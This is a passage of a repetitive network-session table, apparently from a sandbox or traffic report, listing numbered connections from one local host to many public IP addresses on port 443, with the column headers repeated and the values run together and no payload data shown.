                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15289192.168.2.2342132153.106.246.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15290192.168.2.235522892.17.111.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15291192.168.2.2333438189.30.227.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15292192.168.2.234792240.0.42.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15293192.168.2.235979668.251.26.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15294192.168.2.2359512102.195.129.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15295192.168.2.235491272.142.79.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15296192.168.2.2347132149.128.210.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15297192.168.2.233668046.117.15.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15298192.168.2.2339884151.40.96.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15299192.168.2.2338750102.174.34.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15300192.168.2.2334606207.142.176.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15301192.168.2.235359048.54.165.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15302192.168.2.234597827.40.197.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15303192.168.2.2354724217.133.87.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15304192.168.2.235502842.224.126.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15305192.168.2.2347480188.212.20.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15306192.168.2.236065425.15.135.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15307192.168.2.2343806213.45.250.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15308192.168.2.233953899.243.244.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15309192.168.2.2343820213.135.6.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15310192.168.2.2354318143.80.253.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15311192.168.2.234320666.123.42.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15312192.168.2.2343414199.152.130.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15313192.168.2.233855820.252.246.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15314192.168.2.2340276171.23.45.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15315192.168.2.2339352202.30.107.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15316192.168.2.2333092152.57.142.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15317192.168.2.235453638.187.162.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15318192.168.2.2340260207.89.135.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15319192.168.2.2342092106.150.165.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15320192.168.2.2341246133.43.131.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15321192.168.2.235351050.135.124.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15322192.168.2.2356946149.114.238.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15323192.168.2.2351386180.106.56.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15324192.168.2.233851046.23.162.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15325192.168.2.2338446213.224.114.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15326192.168.2.2337928109.219.209.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15327192.168.2.2333920136.26.216.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15328192.168.2.2358624155.177.91.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15329192.168.2.2339214163.84.209.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15330192.168.2.2350590211.14.169.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15331192.168.2.2356288139.107.18.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15332192.168.2.235479847.29.219.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15333192.168.2.234521041.96.166.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15334192.168.2.234813699.83.103.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15335192.168.2.235033427.95.242.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15336192.168.2.233468444.84.200.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15337192.168.2.234105464.153.66.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15338192.168.2.2356908119.92.169.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15339192.168.2.233383240.33.246.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15340192.168.2.233536068.65.203.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15341192.168.2.234921497.8.161.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15342192.168.2.235632644.198.165.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15343192.168.2.2349598199.174.86.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15344192.168.2.235952076.248.30.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15345192.168.2.2334914141.239.66.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15346192.168.2.235904295.166.57.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15347192.168.2.2358568160.251.17.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15348192.168.2.2351114170.69.215.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15349192.168.2.233838849.8.85.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15350192.168.2.234833244.51.109.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15351192.168.2.2349218112.245.53.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15352192.168.2.233872820.11.149.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15353192.168.2.2352240195.248.182.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15354192.168.2.234864845.33.27.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15355192.168.2.234215891.37.127.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15356192.168.2.233670623.213.75.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15357192.168.2.2355526125.186.114.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15358192.168.2.2350114202.163.183.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15359192.168.2.2347662204.176.215.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15360192.168.2.233983257.149.191.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15361192.168.2.235250476.189.55.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15362192.168.2.2353572208.81.81.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15363192.168.2.234451889.252.207.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15364192.168.2.2356490159.192.170.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15365192.168.2.2345654211.89.125.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15366192.168.2.2354826165.203.110.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15367192.168.2.2336818122.214.120.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15368192.168.2.233324294.255.174.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15369192.168.2.235154668.32.124.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15370192.168.2.2350866144.212.174.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15371192.168.2.2337140103.231.109.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15372192.168.2.2347628115.208.99.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15373192.168.2.234198085.213.248.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15374192.168.2.233349478.245.89.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15375192.168.2.2341152126.3.82.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15376192.168.2.233337258.206.217.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15377192.168.2.2353398141.32.115.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15378192.168.2.234079244.185.67.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15379192.168.2.2350004124.58.239.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15380192.168.2.2338294140.61.68.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15381192.168.2.2341618148.164.242.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15382192.168.2.2358474199.135.195.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15383192.168.2.2359836131.145.219.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15384192.168.2.235567878.243.58.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15385192.168.2.2346700111.248.28.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15386192.168.2.2355676179.126.160.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15387192.168.2.2352128193.31.95.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15388192.168.2.2342454120.117.138.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15389192.168.2.235232812.36.71.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15390192.168.2.2334794130.207.83.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15391192.168.2.234526672.224.139.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15392192.168.2.2351360174.58.83.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15393192.168.2.235812237.183.84.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15394192.168.2.235580886.235.134.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15395192.168.2.234377689.231.153.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15396192.168.2.234646838.98.189.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15397192.168.2.2356222144.118.171.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15398192.168.2.2336924100.136.163.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15399192.168.2.2351320167.253.89.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15400192.168.2.235298099.194.184.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15401192.168.2.2337076131.51.169.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15402192.168.2.2342118186.126.62.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15403192.168.2.2337658184.108.180.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15404192.168.2.235591479.179.70.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15405192.168.2.2359714117.251.243.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15406192.168.2.2337396220.188.7.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15407192.168.2.235499085.220.179.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15408192.168.2.2354370189.193.227.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15409192.168.2.234539857.20.85.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15410192.168.2.23454288.55.197.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15411192.168.2.234803469.10.38.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15412192.168.2.2348216218.89.34.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15413192.168.2.2345798211.57.168.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15414192.168.2.23497925.75.25.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15415192.168.2.234983492.83.245.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15416192.168.2.2341088121.31.12.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15417192.168.2.2352962221.158.171.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15418192.168.2.235506459.186.139.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15419192.168.2.234721242.77.8.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15420192.168.2.234854074.102.198.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15421192.168.2.234257884.188.100.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15422192.168.2.234623897.241.99.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15423192.168.2.234927031.93.254.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15424192.168.2.2339314146.34.150.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15425192.168.2.233896852.128.204.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15426192.168.2.233525691.208.202.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15427192.168.2.2337008172.177.205.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15428192.168.2.234846859.162.173.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15429192.168.2.233469419.32.203.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15430192.168.2.2334334103.142.105.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15431192.168.2.233804261.92.24.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15432192.168.2.2336346189.115.240.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15433192.168.2.234030225.65.200.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15434192.168.2.2350832185.177.19.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15435192.168.2.2341734141.36.198.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15436192.168.2.234824848.126.27.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15437192.168.2.234467632.137.238.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15438192.168.2.2347072164.36.56.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15439192.168.2.2335282200.140.141.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15440192.168.2.2341376222.79.114.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15441192.168.2.2357490104.78.148.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15442192.168.2.2335690205.47.97.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15443192.168.2.2345018145.88.123.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15444192.168.2.235776274.175.148.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15445192.168.2.2339432197.244.18.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15446192.168.2.2358594176.220.170.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15447192.168.2.234945499.30.93.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15448192.168.2.2356570134.245.254.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15449192.168.2.234523866.248.198.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15450192.168.2.233709671.134.111.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15451192.168.2.234336242.169.15.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15452192.168.2.235362686.239.91.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15453192.168.2.2333196181.36.111.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15454192.168.2.2333228208.36.82.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15455192.168.2.2352788133.85.28.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15456192.168.2.2349840125.55.230.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15457192.168.2.2345300102.15.37.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15458192.168.2.2337200142.121.178.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15459192.168.2.2355478102.48.116.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15460192.168.2.2356342106.62.5.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15461192.168.2.2360782200.124.180.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15462192.168.2.2350524190.205.250.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15463192.168.2.2346796135.41.155.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15464192.168.2.2357058141.179.56.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15465192.168.2.2337886143.80.17.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15466192.168.2.2352420207.10.147.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15467192.168.2.23594341.138.109.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15468192.168.2.234792250.65.239.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15469192.168.2.2347920163.118.31.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15470192.168.2.2354722222.150.98.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15471192.168.2.2347252174.238.29.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15472192.168.2.2359144162.73.203.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15473192.168.2.2346184103.149.78.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15474192.168.2.234249654.73.166.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15475192.168.2.2335958156.71.6.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15476192.168.2.2342048147.1.40.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15477192.168.2.2359838176.52.133.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15478192.168.2.2358824146.155.235.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15479192.168.2.2335244172.228.103.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15480192.168.2.2333792108.81.64.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15481192.168.2.2354242205.60.201.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15482192.168.2.2341150191.229.49.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15483192.168.2.2333230200.141.90.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15484192.168.2.2347302139.71.102.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15485192.168.2.2344608106.78.226.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15486192.168.2.2348236209.150.110.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15487192.168.2.23554984.60.53.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15488192.168.2.2336978111.26.157.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15489192.168.2.2352560217.161.82.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15490192.168.2.2346600166.121.173.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15491192.168.2.235040485.86.253.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15492192.168.2.2345804125.243.81.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15493192.168.2.2337102208.75.103.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15494192.168.2.2351736167.255.185.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15495192.168.2.234794678.56.86.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15496192.168.2.2344456212.238.231.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15497192.168.2.2348522136.15.142.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15498192.168.2.2341448169.248.57.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15499192.168.2.2357628124.233.75.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15500192.168.2.2339810217.20.175.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15501192.168.2.2338950223.95.148.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15502192.168.2.233576847.230.239.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15503192.168.2.2333200137.36.225.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15504192.168.2.236064432.166.204.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15505192.168.2.235623865.20.249.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15506192.168.2.233310295.87.3.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15507192.168.2.2353830125.182.184.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15508192.168.2.2338544219.130.149.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                15509192.168.2.2341350115.232.190.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
